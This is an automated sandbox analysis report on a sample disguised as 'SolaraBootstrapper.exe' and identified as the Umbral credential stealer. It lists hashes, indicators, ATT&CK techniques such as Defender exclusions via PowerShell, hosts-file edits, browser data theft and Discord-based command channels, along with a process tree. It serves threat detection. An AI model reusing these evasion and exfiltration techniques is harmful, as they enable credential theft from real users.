umbral | 19eae6936192eec5f6c219f1c759646c73c7133137ab6297a84553c7c92ae203

Analysis

max time kernel
91s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 07:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SolaraBootstrapper.exe
Size

7.1MB
MD5

54f95f450352500a4b29ffcfd73321d3
SHA1

191665dc5293c3936218d0bb7a6469781121cf4b
SHA256

19eae6936192eec5f6c219f1c759646c73c7133137ab6297a84553c7c92ae203
SHA512

25903a78e28d4ea37ad6a7bb623880a86464e0d163f9bbf1bb43b559316152e01de55d727c359f9d129946b93de75b17f5c4116ad31d2126c29fd7c8d812509a
SSDEEP

196608:zhhDmMPuq//hu0LDdxgekzhdj+Ib1SBaeycFOOmi:9ZmUu+pu6xKvn5SBnt0i

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000b00000002338a-7.dat	family_umbral
behavioral1/memory/3360-23-0x0000022531D80000-0x0000022531DC0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Blocklisted process makes network request 4 IoCs

flow	pid	Process
68	5100	Process not Found
73	5100	Process not Found
76	5100	Process not Found
78	5100	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2924	powershell.exe
4260	powershell.exe
2824	powershell.exe
1304	powershell.exe
3628	powershell.exe
4940	powershell.exe
4844	powershell.exe
3120	powershell.exe
2308	powershell.exe
3332	powershell.exe
2116	powershell.exe
4168	powershell.exe
336	powershell.exe

Drops file in Drivers directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 40 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe

Executes dropped EXE 64 IoCs

pid	Process
3360	Umbral.exe
4608	Client.exe
3916	Umbral.exe
4440	Client.exe
5088	Umbral.exe
4212	Client.exe
4168	Umbral.exe
948	Client.exe
3564	Umbral.exe
3628	Client.exe
4440	Umbral.exe
2156	Client.exe
1500	Umbral.exe
2924	Client.exe
1896	Umbral.exe
2824	Client.exe
1092	Umbral.exe
3208	Client.exe
472	Umbral.exe
2252	Client.exe
1744	Umbral.exe
1836	Client.exe
4176	Umbral.exe
2804	Client.exe
3100	Umbral.exe
1224	Client.exe
3756	Umbral.exe
3232	Client.exe
3940	Umbral.exe
3896	Client.exe
3936	Umbral.exe
1744	Client.exe
4116	Umbral.exe
1108	Client.exe
3896	Umbral.exe
3052	Client.exe
2332	Umbral.exe
2100	Client.exe
4260	Umbral.exe
3100	Client.exe
4916	Umbral.exe
4140	Client.exe
2280	Umbral.exe
3052	Client.exe
1672	Umbral.exe
2108	Client.exe
4584	Umbral.exe
4140	Client.exe
3060	Umbral.exe
3756	Client.exe
388	Umbral.exe
3720	Client.exe
3332	Umbral.exe
3208	Client.exe
2000	Umbral.exe
2528	Client.exe
3560	Umbral.exe
2100	Client.exe
4284	Umbral.exe
2092	Client.exe
2804	Umbral.exe
4320	Client.exe
4516	Umbral.exe
5100	Client.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

flow	ioc
134	discord.com
154	discord.com
57	discord.com
94	discord.com
111	discord.com
112	discord.com
126	discord.com
93	discord.com
105	discord.com
133	discord.com
49	discord.com
56	discord.com
104	discord.com
140	discord.com
48	discord.com
85	discord.com
34	discord.com
35	discord.com
86	discord.com
148	discord.com
74	discord.com
125	discord.com
147	discord.com
155	discord.com
75	discord.com
141	discord.com

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
144	ip-api.com
43	ip-api.com
82	ip-api.com
108	ip-api.com
120	ip-api.com
130	ip-api.com
90	ip-api.com
29	ip-api.com
61	ip-api.com
137	ip-api.com
53	ip-api.com
98	ip-api.com
151	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 13 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3568	wmic.exe
2308	wmic.exe
2636	wmic.exe
4780	wmic.exe
2224	wmic.exe
872	wmic.exe
4532	wmic.exe
1304	wmic.exe
3452	wmic.exe
2416	wmic.exe
1332	wmic.exe
464	wmic.exe
1856	wmic.exe

Runs ping.exe 1 TTPs 12 IoCs

Remote System Discovery

T1018

pid	Process
2768	PING.EXE
1896	PING.EXE
472	PING.EXE
2268	PING.EXE
2148	PING.EXE
4872	PING.EXE
3228	PING.EXE
3288	PING.EXE
4588	PING.EXE
5108	PING.EXE
3756	PING.EXE
4480	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3360	Umbral.exe
3360	Umbral.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
2836	powershell.exe
2836	powershell.exe
2836	powershell.exe
2496	powershell.exe
2496	powershell.exe
2496	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe
3564	Umbral.exe
3564	Umbral.exe
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
2084	powershell.exe
2084	powershell.exe
2084	powershell.exe
1092	powershell.exe
1092	powershell.exe
1092	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
1896	Umbral.exe
1896	Umbral.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
1468	powershell.exe
1468	powershell.exe
1468	powershell.exe
4176	Umbral.exe
4176	Umbral.exe
4940	powershell.exe
4940	powershell.exe
4940	powershell.exe
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe
2248	powershell.exe
2248	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3360	Umbral.exe
Token: SeIncreaseQuotaPrivilege	4508	wmic.exe
Token: SeSecurityPrivilege	4508	wmic.exe
Token: SeTakeOwnershipPrivilege	4508	wmic.exe
Token: SeLoadDriverPrivilege	4508	wmic.exe
Token: SeSystemProfilePrivilege	4508	wmic.exe
Token: SeSystemtimePrivilege	4508	wmic.exe
Token: SeProfSingleProcessPrivilege	4508	wmic.exe
Token: SeIncBasePriorityPrivilege	4508	wmic.exe
Token: SeCreatePagefilePrivilege	4508	wmic.exe
Token: SeBackupPrivilege	4508	wmic.exe
Token: SeRestorePrivilege	4508	wmic.exe
Token: SeShutdownPrivilege	4508	wmic.exe
Token: SeDebugPrivilege	4508	wmic.exe
Token: SeSystemEnvironmentPrivilege	4508	wmic.exe
Token: SeRemoteShutdownPrivilege	4508	wmic.exe
Token: SeUndockPrivilege	4508	wmic.exe
Token: SeManageVolumePrivilege	4508	wmic.exe
Token: 33	4508	wmic.exe
Token: 34	4508	wmic.exe
Token: 35	4508	wmic.exe
Token: 36	4508	wmic.exe
Token: SeIncreaseQuotaPrivilege	4508	wmic.exe
Token: SeSecurityPrivilege	4508	wmic.exe
Token: SeTakeOwnershipPrivilege	4508	wmic.exe
Token: SeLoadDriverPrivilege	4508	wmic.exe
Token: SeSystemProfilePrivilege	4508	wmic.exe
Token: SeSystemtimePrivilege	4508	wmic.exe
Token: SeProfSingleProcessPrivilege	4508	wmic.exe
Token: SeIncBasePriorityPrivilege	4508	wmic.exe
Token: SeCreatePagefilePrivilege	4508	wmic.exe
Token: SeBackupPrivilege	4508	wmic.exe
Token: SeRestorePrivilege	4508	wmic.exe
Token: SeShutdownPrivilege	4508	wmic.exe
Token: SeDebugPrivilege	4508	wmic.exe
Token: SeSystemEnvironmentPrivilege	4508	wmic.exe
Token: SeRemoteShutdownPrivilege	4508	wmic.exe
Token: SeUndockPrivilege	4508	wmic.exe
Token: SeManageVolumePrivilege	4508	wmic.exe
Token: 33	4508	wmic.exe
Token: 34	4508	wmic.exe
Token: 35	4508	wmic.exe
Token: 36	4508	wmic.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeIncreaseQuotaPrivilege	3892	wmic.exe
Token: SeSecurityPrivilege	3892	wmic.exe
Token: SeTakeOwnershipPrivilege	3892	wmic.exe
Token: SeLoadDriverPrivilege	3892	wmic.exe
Token: SeSystemProfilePrivilege	3892	wmic.exe
Token: SeSystemtimePrivilege	3892	wmic.exe
Token: SeProfSingleProcessPrivilege	3892	wmic.exe
Token: SeIncBasePriorityPrivilege	3892	wmic.exe
Token: SeCreatePagefilePrivilege	3892	wmic.exe
Token: SeBackupPrivilege	3892	wmic.exe
Token: SeRestorePrivilege	3892	wmic.exe
Token: SeShutdownPrivilege	3892	wmic.exe
Token: SeDebugPrivilege	3892	wmic.exe
Token: SeSystemEnvironmentPrivilege	3892	wmic.exe
Token: SeRemoteShutdownPrivilege	3892	wmic.exe
Token: SeUndockPrivilege	3892	wmic.exe
Token: SeManageVolumePrivilege	3892	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 3632	2464	SolaraBootstrapper.exe	95
PID 2464 wrote to memory of 3632	2464	SolaraBootstrapper.exe	95
PID 2464 wrote to memory of 3360	2464	SolaraBootstrapper.exe	96
PID 2464 wrote to memory of 3360	2464	SolaraBootstrapper.exe	96
PID 2464 wrote to memory of 4608	2464	SolaraBootstrapper.exe	97
PID 2464 wrote to memory of 4608	2464	SolaraBootstrapper.exe	97
PID 3632 wrote to memory of 4712	3632	SolaraBootstrapper.exe	102
PID 3632 wrote to memory of 4712	3632	SolaraBootstrapper.exe	102
PID 3632 wrote to memory of 3916	3632	SolaraBootstrapper.exe	103
PID 3632 wrote to memory of 3916	3632	SolaraBootstrapper.exe	103
PID 3632 wrote to memory of 4440	3632	SolaraBootstrapper.exe	104
PID 3632 wrote to memory of 4440	3632	SolaraBootstrapper.exe	104
PID 3360 wrote to memory of 4508	3360	Umbral.exe	106
PID 3360 wrote to memory of 4508	3360	Umbral.exe	106
PID 3360 wrote to memory of 2192	3360	Umbral.exe	108
PID 3360 wrote to memory of 2192	3360	Umbral.exe	108
PID 3360 wrote to memory of 3628	3360	Umbral.exe	119
PID 3360 wrote to memory of 3628	3360	Umbral.exe	119
PID 3360 wrote to memory of 2836	3360	Umbral.exe	112
PID 3360 wrote to memory of 2836	3360	Umbral.exe	112
PID 3360 wrote to memory of 2496	3360	Umbral.exe	114
PID 3360 wrote to memory of 2496	3360	Umbral.exe	114
PID 4712 wrote to memory of 3232	4712	SolaraBootstrapper.exe	116
PID 4712 wrote to memory of 3232	4712	SolaraBootstrapper.exe	116
PID 4712 wrote to memory of 5088	4712	SolaraBootstrapper.exe	117
PID 4712 wrote to memory of 5088	4712	SolaraBootstrapper.exe	117
PID 3360 wrote to memory of 1104	3360	Umbral.exe	118
PID 3360 wrote to memory of 1104	3360	Umbral.exe	118
PID 4712 wrote to memory of 4212	4712	SolaraBootstrapper.exe	120
PID 4712 wrote to memory of 4212	4712	SolaraBootstrapper.exe	120
PID 3360 wrote to memory of 3892	3360	Umbral.exe	122
PID 3360 wrote to memory of 3892	3360	Umbral.exe	122
PID 3360 wrote to memory of 464	3360	Umbral.exe	124
PID 3360 wrote to memory of 464	3360	Umbral.exe	124
PID 3232 wrote to memory of 3096	3232	SolaraBootstrapper.exe	126
PID 3232 wrote to memory of 3096	3232	SolaraBootstrapper.exe	126
PID 3360 wrote to memory of 2756	3360	Umbral.exe	127
PID 3360 wrote to memory of 2756	3360	Umbral.exe	127
PID 3360 wrote to memory of 4768	3360	Umbral.exe	148
PID 3360 wrote to memory of 4768	3360	Umbral.exe	148
PID 3232 wrote to memory of 4168	3232	SolaraBootstrapper.exe	131
PID 3232 wrote to memory of 4168	3232	SolaraBootstrapper.exe	131
PID 3232 wrote to memory of 948	3232	SolaraBootstrapper.exe	151
PID 3232 wrote to memory of 948	3232	SolaraBootstrapper.exe	151
PID 3360 wrote to memory of 2308	3360	Umbral.exe	147
PID 3360 wrote to memory of 2308	3360	Umbral.exe	147
PID 3360 wrote to memory of 2736	3360	Umbral.exe	137
PID 3360 wrote to memory of 2736	3360	Umbral.exe	137
PID 2736 wrote to memory of 1896	2736	cmd.exe	139
PID 2736 wrote to memory of 1896	2736	cmd.exe	139
PID 3096 wrote to memory of 3720	3096	SolaraBootstrapper.exe	140
PID 3096 wrote to memory of 3720	3096	SolaraBootstrapper.exe	140
PID 3096 wrote to memory of 3564	3096	SolaraBootstrapper.exe	141
PID 3096 wrote to memory of 3564	3096	SolaraBootstrapper.exe	141
PID 3096 wrote to memory of 3628	3096	SolaraBootstrapper.exe	142
PID 3096 wrote to memory of 3628	3096	SolaraBootstrapper.exe	142
PID 3564 wrote to memory of 2824	3564	Umbral.exe	143
PID 3564 wrote to memory of 2824	3564	Umbral.exe	143
PID 3564 wrote to memory of 4940	3564	Umbral.exe	145
PID 3564 wrote to memory of 4940	3564	Umbral.exe	145
PID 3564 wrote to memory of 2308	3564	Umbral.exe	147
PID 3564 wrote to memory of 2308	3564	Umbral.exe	147
PID 3564 wrote to memory of 2084	3564	Umbral.exe	149
PID 3564 wrote to memory of 2084	3564	Umbral.exe	149

Views/modifies file attributes 1 TTPs 13 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
464	attrib.exe
1500	attrib.exe
3308	attrib.exe
4480	attrib.exe
2192	attrib.exe
1224	attrib.exe
3332	attrib.exe
4940	attrib.exe
4500	attrib.exe
1708	attrib.exe
1136	attrib.exe
1112	attrib.exe
4440	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3232
    - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3096
      - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        6⤵
        Checks computer location settings
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        7⤵
        Checks computer location settings
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        8⤵
        Checks computer location settings
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        9⤵
        Checks computer location settings
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        10⤵
        Checks computer location settings
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        11⤵
        Checks computer location settings
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        12⤵
        Checks computer location settings
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        13⤵
        Checks computer location settings
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        14⤵
        Checks computer location settings
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        15⤵
        Checks computer location settings
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        16⤵
        Checks computer location settings
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        17⤵
        Checks computer location settings
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        18⤵
        Checks computer location settings
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        19⤵
        Checks computer location settings
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        20⤵
        Checks computer location settings
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        21⤵
        Checks computer location settings
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        22⤵
        Checks computer location settings
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        23⤵
        Checks computer location settings
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        24⤵
        Checks computer location settings
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        25⤵
        Checks computer location settings
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        26⤵
        Checks computer location settings
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        27⤵
        Checks computer location settings
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        28⤵
        Checks computer location settings
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        29⤵
        Checks computer location settings
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        30⤵
        Checks computer location settings
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        31⤵
        Checks computer location settings
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        32⤵
        Checks computer location settings
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        33⤵
        Checks computer location settings
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        34⤵
        Checks computer location settings
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        35⤵
        Checks computer location settings
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        36⤵
        Checks computer location settings
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        37⤵
        Checks computer location settings
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        38⤵
        Checks computer location settings
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        39⤵
        Checks computer location settings
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        40⤵
        Checks computer location settings
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        41⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        42⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        43⤵
        
        PID:3900
        
